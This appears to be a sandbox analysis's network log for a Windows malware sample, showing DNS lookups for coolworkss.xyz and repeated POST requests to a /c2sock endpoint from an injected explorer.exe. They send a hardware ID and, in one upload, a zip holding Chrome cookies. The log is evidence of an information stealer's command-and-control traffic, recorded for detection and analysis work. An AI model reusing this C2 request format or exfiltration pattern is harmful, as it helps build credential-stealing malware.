Sep 5, 2023 13:02:36.358743906 CEST	8.8.8.8	192.168.2.4	0x631b	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:36.358743906 CEST	8.8.8.8	192.168.2.4	0x631b	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:37.649600029 CEST	8.8.8.8	192.168.2.4	0xbfcc	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:37.649600029 CEST	8.8.8.8	192.168.2.4	0xbfcc	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:38.370668888 CEST	8.8.8.8	192.168.2.4	0x9338	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:38.370668888 CEST	8.8.8.8	192.168.2.4	0x9338	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:39.096272945 CEST	8.8.8.8	192.168.2.4	0xb151	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:39.096272945 CEST	8.8.8.8	192.168.2.4	0xb151	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:39.789850950 CEST	8.8.8.8	192.168.2.4	0x2f06	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:39.789850950 CEST	8.8.8.8	192.168.2.4	0x2f06	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:40.516215086 CEST	8.8.8.8	192.168.2.4	0x19f4	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:40.516215086 CEST	8.8.8.8	192.168.2.4	0x19f4	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:41.165035009 CEST	8.8.8.8	192.168.2.4	0x961d	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:41.165035009 CEST	8.8.8.8	192.168.2.4	0x961d	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:41.837364912 CEST	8.8.8.8	192.168.2.4	0xe3f9	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:41.837364912 CEST	8.8.8.8	192.168.2.4	0xe3f9	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:42.603630066 CEST	8.8.8.8	192.168.2.4	0x990f	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:42.603630066 CEST	8.8.8.8	192.168.2.4	0x990f	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:43.416393042 CEST	8.8.8.8	192.168.2.4	0x5be2	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:43.416393042 CEST	8.8.8.8	192.168.2.4	0x5be2	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:44.179506063 CEST	8.8.8.8	192.168.2.4	0x2644	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:44.179506063 CEST	8.8.8.8	192.168.2.4	0x2644	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:45.060606956 CEST	8.8.8.8	192.168.2.4	0x5c16	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:45.060606956 CEST	8.8.8.8	192.168.2.4	0x5c16	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:45.832770109 CEST	8.8.8.8	192.168.2.4	0x9462	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:45.832770109 CEST	8.8.8.8	192.168.2.4	0x9462	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:46.580255032 CEST	8.8.8.8	192.168.2.4	0xcdbc	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:46.580255032 CEST	8.8.8.8	192.168.2.4	0xcdbc	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:47.306771040 CEST	8.8.8.8	192.168.2.4	0x386d	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:02:47.306771040 CEST	8.8.8.8	192.168.2.4	0x386d	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:03.270160913 CEST	8.8.8.8	192.168.2.4	0xcb86	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:03.270160913 CEST	8.8.8.8	192.168.2.4	0xcb86	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:04.000036001 CEST	8.8.8.8	192.168.2.4	0x343a	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:04.000036001 CEST	8.8.8.8	192.168.2.4	0x343a	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:04.855694056 CEST	8.8.8.8	192.168.2.4	0x6336	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:04.855694056 CEST	8.8.8.8	192.168.2.4	0x6336	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:05.550044060 CEST	8.8.8.8	192.168.2.4	0x14a7	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:05.550044060 CEST	8.8.8.8	192.168.2.4	0x14a7	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:06.600178003 CEST	8.8.8.8	192.168.2.4	0xec9d	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:06.600178003 CEST	8.8.8.8	192.168.2.4	0xec9d	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:08.428569078 CEST	8.8.8.8	192.168.2.4	0x5e77	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:08.428569078 CEST	8.8.8.8	192.168.2.4	0x5e77	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:09.125320911 CEST	8.8.8.8	192.168.2.4	0x4109	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:09.125320911 CEST	8.8.8.8	192.168.2.4	0x4109	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:10.478565931 CEST	8.8.8.8	192.168.2.4	0x429d	No error (0)	coolworkss.xyz		172.67.195.229	A (IP address)	IN (0x0001)	false
Sep 5, 2023 13:03:10.478565931 CEST	8.8.8.8	192.168.2.4	0x429d	No error (0)	coolworkss.xyz		104.21.60.111	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

wwf.org

www.worldwildlife.org

i.imgur.com

coolworkss.xyz

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49717	104.18.6.142	443	C:\Users\user\Desktop\lJ2eYRm0Bd.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49718	104.18.6.94	443	C:\Users\user\Desktop\lJ2eYRm0Bd.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49744	104.21.60.111	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:28.208111048 CEST	2790	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:28.209821939 CEST	2790	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:28.619004965 CEST	2791	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=ke5gpi0qcoihdegluu1stv46vd; expires=Sat, 30 Dec 2023 04:49:07 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bs5mirgAl6RvjVeb9Jocdma6dSySHUxXF4E9vpeum0lRjzZ8mr%2BHufKEN507O9mlciZsTXF6E%2Bv89w%2B6LM77w5pKOJTLDKLajcVUg3hEqBbVhLReZ13hP1ZHOfimsZsx%2Fw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfaeab8e48db5-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:28.619040012 CEST	2791	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.4	49745	104.21.60.111	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:28.913234949 CEST	2792	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:28.915260077 CEST	2792	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:29.344266891 CEST	2793	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=r5roecc3rr696l695k5q6jqfmu; expires=Sat, 30 Dec 2023 04:49:08 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t%2BNmaF7mqpO5PC9lQrriwkCCQ55oBo8tw8ZBQC3VrdYBpC7YbdkeUETG0eAKPvdmJZSE%2F3Eycn4NDVRJUApKOUNFgwpmh0Ai7lCdNrnWYJg81DRu3DVuI5HyOknBSZEqJA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfaef19719ab7-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:29.344326973 CEST	2793	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.4	49746	104.21.60.111	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:29.654974937 CEST	2794	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:29.656461000 CEST	2795	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:30.049473047 CEST	2796	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=evekjm2aemliqd23mvd7hb8v2f; expires=Sat, 30 Dec 2023 04:49:08 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NvsflvczW6omWe5Tghi%2FrlSBndkRGZ3Qr8a67aQj6KImqOhzGiiupDpt6B4pa3cVkbE7nFUnERw3vTnR0Y3DBcOH3aRnXzziuNt5QwhCHKN7xyZr42GaNmDwcl4v4PFMXA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfaf3be5d09de-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:30.049539089 CEST	2796	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.4	49747	104.21.60.111	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:30.497769117 CEST	2796	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:30.498931885 CEST	2797	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:30.906497002 CEST	2798	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=okdsekbsrj9pprhsn71t6l23mb; expires=Sat, 30 Dec 2023 04:49:09 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WO1vwqjxmoMlp0MOPuqC77aS%2FuopWZwl6rmeMY4oRX7WM0spMT0%2B0MPItZ8%2FWL08abRqvnWkBlqhwUtHo4BZxA5nLC%2FgJ1fKrYKOrpRgrqHyHZVfhlorn9ltC%2BMuOM9rWQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfaf90b8c3347-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:30.906534910 CEST	2798	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.4	49748	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:31.868135929 CEST	2799	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:31.869343996 CEST	2799	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:32.269529104 CEST	2800	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=ihf5ng3tdefjnjf0tcmi4vt8eb; expires=Sat, 30 Dec 2023 04:49:11 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l9bSXd6%2BVWXo8dEeU5TmhSntIDpy9wD58BFLqogZDcUZCPz0dsRb9ned9U%2BJwEthpocLJa4N01i3QeKyjwfuaH4LitNqDVH%2BDU45CB0j9FscSPcyonxlxLuEPC1sbpVs4A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfb019c172260-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:32.269563913 CEST	2800	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.4	49749	104.21.60.111	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:34.827600956 CEST	2801	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 25107 Host: coolworkss.xyz
Sep 5, 2023 13:02:34.828911066 CEST	2812	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:34.956255913 CEST	2814	OUT	Data Raw: af 3f 4c 3d 0d a0 c7 e8 5d d8 c0 8e 86 dd 5e 4b 5f df 4e f5 bc 3d d8 3b 7c a5 d6 b3 e3 9e cb 26 9b fb ca 19 9a 6a 0c cc 1b c7 83 af 69 b2 11 d6 ef 13 f8 2c a7 2f cd fa e7 ff 8f 9a 7e 8f 62 ae 8c 7d 34 66 77 fd ad 2b e3 b2 8e fe f9 a9 9f 9f ca 8e Data Ascii: ?L=]^K_N=;\|&ji,/~b}4fw+s#cgov~B2`z?3isjznN2$Hv<_rQ%;]k<mnY]q;].`w=K~>G
Sep 5, 2023 13:02:34.957494974 CEST	2816	OUT	Data Raw: 95 84 8f e3 22 91 5b 81 5b b1 4b 8d 6f 39 88 85 66 be 4b a2 30 b7 9d 59 f2 c6 2f 35 36 92 e5 73 35 55 98 5b 5e 5f 5f 5e 49 65 93 f3 db 5b a9 6c 6a 27 b5 ba 91 49 af af 4d 86 16 d3 8b 64 11 0b 87 22 f1 70 34 1c cd 45 0b b1 78 2c 3a 9b 59 25 b1 5c Data Ascii: "[[Ko9fK0Y/56s5U[^__^Ie[lj'IMd"p4Ex,:Y%\4EH 6@lz<>.}wvDhZ`5_#EKrh{24?1r IzpwWTgi.MJ` B!n6^^-pCQV18ODRM;'CK{dzCOISOr_i~u Z
Sep 5, 2023 13:02:34.957562923 CEST	2819	OUT	Data Raw: a2 50 80 f5 7f 00 00 00 00 e8 3d a0 ff 07 00 00 00 80 de 03 fa 7f 00 00 00 00 e8 3d a0 ff 07 00 00 00 80 de 63 80 7d 44 e9 17 fc f4 db fe 17 00 00 00 00 00 5f 6d 2e 66 60 fe 0f 00 00 00 00 bd 47 8e 1f a0 ff 07 00 00 00 80 9e 22 27 7e 2a f4 09 e7 Data Ascii: P==c}D_m.f`G"'~*p.m`vF1{`q\VZq,br +RTV)rb)8JjVo?v_Y6}oi{{kS04.#j=zgax?s
Sep 5, 2023 13:02:34.957626104 CEST	2826	OUT	Data Raw: 00 00 70 01 00 00 00 00 00 50 4b 03 04 14 00 08 08 08 00 50 68 25 57 00 00 00 00 00 00 00 00 00 00 00 00 1e 00 04 00 43 68 72 6f 6d 65 2f 44 65 66 61 75 6c 74 2f 4e 65 74 77 6f 72 6b 2f 43 6f 6f 6b 69 65 73 01 00 00 00 ed 9b 79 54 13 d7 1e c7 27 Data Ascii: pPKPh%WChrome/Default/Network/CookiesyT',aP!R0@4Ly2<zVPR7">[7 s30sp!CYIreCf-` qqX4cWCp2\|D{N\|]
Sep 5, 2023 13:02:35.421880007 CEST	2827	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=9u8qslvhght5enf5ogt0i5dlfa; expires=Sat, 30 Dec 2023 04:49:14 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cd2F7isNkqSDN51blVyvZW%2BbxnGnbHdyGoQbQ%2B2fDNQeDT%2Bfz4EmXk74yUQY%2BNhuIArVqGb1Diu8pMXUbEo2SSYuAZoPgz8NCM3zIkpuNIB3L9L2RYpQJqYVmEqgEuiSdQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfb141aba8e06-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:35.421907902 CEST	2827	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.4	49750	172.67.195.229	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:35.757108927 CEST	2828	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:35.759838104 CEST	2828	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
Sep 5, 2023 13:02:36.162883997 CEST	2829	IN	HTTP/1.1 200 OK Date: Tue, 05 Sep 2023 11:02:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/8.2.7 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=c5csl3mtmcenvlk8753n12p0r5; expires=Sat, 30 Dec 2023 04:49:15 GMT; Max-Age=9999999; path=/ CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KtTbERSw7G9F7YCZkaA40rFgvR4sUUQBWcgVd4byoCMd6ab0WGG%2FrfiIbi1hotS1qI%2B%2F0lwcHH%2Ba5i6OgryeUm3OKaVev%2BTfnwipVc68FzsRN13Rrw0YJPQGuSRbR6bM%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 801dfb19eafe21eb-MIA Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
Sep 5, 2023 13:02:36.162936926 CEST	2830	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.4	49751	104.21.60.111	80	C:\Windows\SysWOW64\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 5, 2023 13:02:36.491511106 CEST	2830	OUT	POST /c2sock HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74 User-Agent: TeslaBrowser/5.5 Content-Length: 450 Host: coolworkss.xyz
Sep 5, 2023 13:02:36.492686033 CEST	2831	OUT	Data Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 32 39 45 41 34 44 43 32 Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"4D29EA4DC2284E848159532CDC512514CEF81D62--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data
